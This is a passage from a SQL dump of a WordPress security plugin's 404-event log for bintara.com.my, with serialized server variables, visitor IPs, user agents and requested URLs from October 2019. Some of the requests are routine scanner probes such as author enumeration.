07:15:17','2019-10-06 07:15:15',35523072,37316232,'https://bintara.com.my/mailbox-migration-exchange-online/',1,0,'13.66.139.0'),(27574,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/author/admin/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/author/admin/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZmF2Xe8CK6y8PnE8iNNGwAAAMU\";s:12:\"REDIRECT_URL\";s:14:\"/author/admin/\";s:11:\"REMOTE_ADDR\";s:13:\"212.75.202.74\";s:11:\"REMOTE_PORT\";s:5:\"54833\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:10:\"SCRIPT_URL\";s:14:\"/author/admin/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZmF2Xe8CK6y8PnE8iNNGwAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570342361.4062\";s:12:\"REQUEST_TIME\";s:10:\"1570342361\";}}','notice','2019-10-06 06:12:44','2019-10-06 06:12:41',35523272,37330752,'https://bintara.com.my/author/admin/',1,0,'212.75.202.74'),(27573,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:33:\"gzip, deflate;q=1.0, identity;q=0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.65.219.132\";s:11:\"REMOTE_PORT\";s:5:\"62003\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZmCdXe8CK6y8PnE8iNKjQAAANE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570341493.6066\";s:12:\"REQUEST_TIME\";s:10:\"1570341493\";}}','notice','2019-10-06 05:58:15','2019-10-06 05:58:14',35021200,36824992,'https://bintara.com.my/?page_id=18',1,0,'159.65.219.132'),(27571,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 JuziBrowser\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"64841\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZlyKIUY8eGcCNBrto1xFwAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570337321.046\";s:12:\"REQUEST_TIME\";s:10:\"1570337321\";}}','notice','2019-10-06 04:48:43','2019-10-06 04:48:41',35414496,37221472,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(27572,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/images/7.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=80ce735a9c508698541dfb5e0b06c705\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:35:\"http://bintara.com.my//images/7.asp\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/images/7.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/images/7.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZl6L3e8CK6y8PnE8iNDwAAAANE\";s:12:\"REDIRECT_URL\";s:13:\"/images/7.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"180.113.62.141\";s:11:\"REMOTE_PORT\";s:5:\"63451\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/images/7.asp\";s:10:\"SCRIPT_URL\";s:13:\"/images/7.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZl6L3e8CK6y8PnE8iNDwAAAANE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570339375.2854\";s:12:\"REQUEST_TIME\";s:10:\"1570339375\";}}','notice','2019-10-06 05:22:57','2019-10-06 05:22:55',35033864,36844760,'https://bintara.com.my/images/7.asp',1,0,'180.113.62.141'),(27570,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:69:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"64482\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZltHYUY8eGcCNBrto1vlwAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570336029.2715\";s:12:\"REQUEST_TIME\";s:10:\"1570336029\";}}','notice','2019-10-06 04:27:12','2019-10-06 04:27:09',35415472,37223856,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(27569,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:68:\"Mozilla/5.0 (Windows NT 10.0; rv:59.0) Gecko/20100101 Firefox/59.0.2\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"179.208.228.4\";s:11:\"REMOTE_PORT\";s:5:\"58295\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZlg@YUY8eGcCNBrto1raQAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570332921.4176\";s:12:\"REQUEST_TIME\";s:10:\"1570332921\";}}','notice','2019-10-06 03:35:24','2019-10-06 03:35:21',35411656,37217800,'https://bintara.com.my/?page_id=18',1,0,'179.208.228.4'),(27568,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"191.101.95.14\";s:11:\"REMOTE_PORT\";s:5:\"51282\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZlevoUY8eGcCNBrto1qeQAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570332350.7989\";s:12:\"REQUEST_TIME\";s:10:\"1570332350\";}}','notice','2019-10-06 03:25:53','2019-10-06 03:25:51',35419304,37233008,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'191.101.95.14'),(27567,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3451.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"195.9.209.10\";s:11:\"REMOTE_PORT\";s:5:\"41858\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZlNtIUY8eGcCNBrto1f3wAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570327988.6698\";s:12:\"REQUEST_TIME\";s:10:\"1570327988\";}}','notice','2019-10-06 02:13:11','2019-10-06 02:13:09',35423776,37240120,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'195.9.209.10'),(27566,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"3904E3E3-A1DD-4C29-B02E-EA11DB70348D\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZlMdIUY8eGcCNBrto1fYAAAAQ8\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.181\";s:11:\"REMOTE_PORT\";s:5:\"50713\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZlMdIUY8eGcCNBrto1fYAAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570327668.8097\";s:12:\"REQUEST_TIME\";s:10:\"1570327668\";}}','notice','2019-10-06 02:07:50','2019-10-06 02:07:49',35387360,37189536,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.181'),(27565,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3451.0 